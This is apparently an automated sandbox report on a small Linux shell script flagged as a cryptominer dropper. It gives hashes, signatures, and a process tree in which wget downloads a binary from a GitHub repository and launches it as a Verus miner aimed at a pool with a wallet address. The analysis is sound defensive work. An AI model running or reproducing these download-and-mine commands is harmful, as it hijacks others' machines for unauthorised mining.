Analysis

  • max time kernel
    1s
  • max time network
    2s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20240523-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2404-amd64-20240523-en, kernel:6.8.0-31-generic, locale:en-us, os:ubuntu-24.04-amd64, system
  • submitted
    13/07/2024, 16:38

General

  • Target

    v.sh

  • Size

    210B

  • MD5

    c0509438798d06d2af34b3c438c03535

  • SHA1

    9a75456855a4c9f572dbfa8d4ffc58c6b6c95ebf

  • SHA256

    f6ee0a8d2a02e947ad9f7be5bd3bee76f785161675ba02cfda1bf25937dd36f2

  • SHA512

    1a7bff03425010611693998ab693862eaef935fbef330f92de055183242d0b5ed9f142b9ecc15b1451efa0d280416b20cdadce12142ad415939984c2be35347f

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/v.sh
    /tmp/v.sh
    1⤵
      PID:2479
      • /usr/bin/wget
        wget https://github.com/MomboteQ/Free-Crypto-Mining/raw/main/verus/cc
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:2480
      • /usr/bin/chmod
        chmod +x cc
        2⤵
        PID:2487
      • /usr/bin/clear
        clear
        2⤵
        PID:2488
      • /usr/bin/nproc
        nproc
        2⤵
        PID:2489
      • /tmp/cc
        ./cc -a verus -o stratum+tcp://us.vipor.net:5040 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Triage -p x -t 1
        2⤵
        • Executes dropped EXE
        PID:2490

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /root/.wget-hsts

    Filesize

    215B

    MD5

    ef750b8dc3da5aa3d3c2a052a449e90b

    SHA1

    f719c9fe70597a9678fa6ab4c02bcb4a6a566737

    SHA256

    a24e104f579c9dd9cecf22ac9a9505b32df5914a15243391f1e728e692645854

    SHA512

    302c6f74db4e729ce24194e16d2b1a65756df4e6b71be5eef67131d9f61ae4c20fdea881f1da7644f88317632eedfdc9ea40518952849c6ddc5b2c4b32eb63d8

  • /tmp/cc

    Filesize

    196KB

    MD5

    4011d473f6b06caa7f3d514e4eeb2184

    SHA1

    529bda4d64920cac51baa6b34b8bcabf19d97248

    SHA256

    bf7d1a01e88322991a824676601b46be7625b50a9d8ee8de085cc86ba76f7bc2

    SHA512

    45f9da5d9f43c1876fc3659a8e7e03b9d06ec83bf6c8d237daf3809cbec01a5c59688a1cf4780d695750fc42920428ff69545f5dce11b888418df919c3625f39